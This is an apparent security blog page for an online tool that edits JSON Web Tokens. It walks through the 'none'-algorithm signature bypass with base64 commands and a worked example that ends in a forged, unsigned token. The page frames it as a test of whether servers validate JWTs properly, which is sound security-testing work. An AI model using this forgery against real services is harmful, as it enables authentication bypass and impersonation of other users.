Edit JWT Online (setting algorithm to none)

Online editor for a JWT token to use the "none" algorithm. Edit the header and the payload, get the encoded output.

One of the tests to ensure a JSON Web Token (JWT) is implemented securely is to try to alter the algorithm used to sign it. The signature confirms it hasn't been modified by an attacker. If the algorithm is "none" then when the signature is checked, it might just be ignored completely. This means we can edit the content of the JWT and have it accepted, bypassing this important security feature.

Paste an encoded JWT below to edit it. The altered version appears in the last text box.











How to do this in Linux (if you don't have access to this page):

Start with the encoded token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Split the encoded token into segments delimited by the "." character.


The first block is the header, decode that:

echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d

Here, the result is:

{"alg":"HS256","typ":"JWT"}

You can manually edit this and alter the algorithm, here we're changing it to "none". Once changed we can base64 encode it again to become useable:

echo -n '{"alg":"none","typ":"JWT"}' | base64

The result of that is :

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=

IMPORTANT: Remove the trailing "=" before we use it to replace the first part of the JWT.

Follow the same process to edit the JWT payload (second encoded block).

echo 'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ' | base64 -d

Result:

{"sub":"1234567890","name":"John Doe","iat":1516239022}

We'll edit the name from John Doe to be Jane Doe and encode it:

echo -n '{"sub":"1234567890","name":"Jane Doe","iat":1516239022}' | base64

Result:

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==

If we're setting the algorithm to "none" then we don't want a signature. The format we'll get is:

{encoded header}.{encoded payload}.

Note the "." on the end. This would normally have the signature after it but because we're saying the algorithm is none then no signature is needed.

Our example becomes:

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.

We've successfully edited a JWT and can test to see if the server accepts the edited version.


Got a comment or correction (I’m not perfect) for this post? Please leave a comment below.
You've successfully subscribed to Gavin Johnson-Lynn!




My Pluralsight Courses: (Get a free Pluaralsight trial)

API Security with the OWASP API Security Top 10

OWASP Top 10: What's New

OWASP Top 10: API Security Playbook

Secure Coding with OWASP in ASP.Net Core 6

Secure Coding: Broken Access Control

Python Secure Coding Playbook